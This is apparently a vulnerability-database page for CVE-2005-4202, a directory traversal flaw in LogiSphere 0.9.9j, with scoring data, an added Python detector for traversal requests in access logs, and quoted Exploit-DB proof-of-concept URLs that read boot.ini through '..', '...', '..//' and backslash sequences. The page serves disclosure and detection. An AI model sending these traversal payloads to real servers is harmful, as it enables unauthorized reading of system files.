CVE-2005-4202
Published 2005-12-13
Priority: P4 (28)
CVSS 2.0: 5 (medium), vector AV:N/AC:L/Au:N/C:P/I:N/A:N
Exploit: listed
EPSS: 3.42% (87.4th percentile)
Multiple directory traversal vulnerabilities in LogiSphere 0.9.9j allow remote attackers to access arbitrary files via (1) .. (dot dot), (2) "..." (triple dot), and (3) "..//" sequences in the URL, (4) "../" sequences in the source parameter to viewsource.jsp, or (5) "..\" (dot dot backslash) sequences in the NS-query-pat parameter to the search URL.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| logisphere | logisphere | — | — |
No detection rules found.
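An added example (not from the advisory, Exploit-DB, or this site's rule index): a Python check that flags access-log request targets matching the five vectors in the description above. The log format, function names and sample lines are assumptions constructed for illustration, and the parameter check accepts either path separator, which is slightly broader than the advisory's wording.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def _decode(value, rounds=3):
    # Bounded repeated percent-decoding: %2e%2e and %252e%252e both become "..".
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def _param_traverses(query, name):
    # Dot-dot step in parameter `name`, with "/" or "\" as the separator.
    values = parse_qs(query).get(name, [])
    return any("../" in _decode(v).replace("\\", "/") for v in values)

def classify(target):
    """Return the CVE-2005-4202 vector numbers (1-5) a request target matches."""
    parts = urlsplit(target)
    path = _decode(parts.path)
    segments = path.split("/")
    hits = set()
    if "..//" in path:
        hits.add(3)
    elif ".." in segments:
        hits.add(1)
    if "..." in segments:
        hits.add(2)
    leaf = segments[-1].lower()
    if leaf == "viewsource.jsp" and _param_traverses(parts.query, "source"):
        hits.add(4)
    if leaf == "search" and _param_traverses(parts.query, "NS-query-pat"):
        hits.add(5)
    return sorted(hits)

def scan(log_lines):
    # (line_number, vectors) for each access-log line that matches any vector.
    targets = ((n, REQUEST.search(line)) for n, line in enumerate(log_lines, 1))
    hits = ((n, classify(m.group(1))) for n, m in targets if m)
    return [(n, v) for n, v in hits if v]

# Constructed sample lines (not real traffic), shaped like the advisory's requests.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Dec/2005:10:00:01 +0000] "GET /%2e%2e/%2e%2e/boot.ini HTTP/1.0" 200 211',
    '192.0.2.10 - - [13/Dec/2005:10:00:02 +0000] "GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=../../boot.ini HTTP/1.0" 200 211',
    '192.0.2.11 - - [13/Dec/2005:10:00:03 +0000] "GET /docs/v1..2/notes.txt HTTP/1.0" 200 900',
    r'192.0.2.10 - - [13/Dec/2005:10:00:04 +0000] "GET /search?NS-query-pat=..\..\boot.ini HTTP/1.0" 200 211',
]
```

Segment-based matching keeps names such as `v1..2` from triggering, and decoding before matching covers percent-encoded forms of the same sequences.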
Exploit-DB
LogiSphere 0.9.9 j - 'viewsource.jsp?source' Traversal Arbitrary File Access
exploitdb·2005-12-12
---
source: https://www.securityfocus.com/bid/15807/info
LogiSphere is prone to multiple directory traversal vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the Web server process. Information obtained may aid in further attacks; other attacks are also possible.
http://www.example.com:8080/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
Exploit-DB
LogiSphere 0.9.9 j - URI Multiple Method Traversal Arbitrary File Access
exploitdb·2005-12-12
---
source: https://www.securityfocus.com/bid/15807/info
http://www.example.com:8080/.../.../.../.../.../.../.../boot.ini
http://www.example.com:8080/../../../../../../../../../boot.ini
http://www.example.com:8080/../../../boot.ini
http://www.example.com:8080/..//..//..//..//..//..//..//boot.ini
http://www.example.com:8080/boot.ini
ht
Exploit-DB
LogiSphere 0.9.9 j - 'Search?NS-query-pat' Traversal Arbitrary File Access
exploitdb·2005-12-12
---
source: https://www.securityfocus.com/bid/15807/info
http://www.example.com:8080/search?NS-query-pat=..\..\..\..\..\..\..\..\boot.ini
No writeups or analysis indexed.
http://secunia.com/advisories/17989
http://www.ipomonis.com/advisories/logisphere_server.zip
http://www.securityfocus.com/bid/15807
http://www.vupen.com/english/advisories/2005/2840
https://exchange.xforce.ibmcloud.com/vulnerabilities/23552
Published: 2005-12-13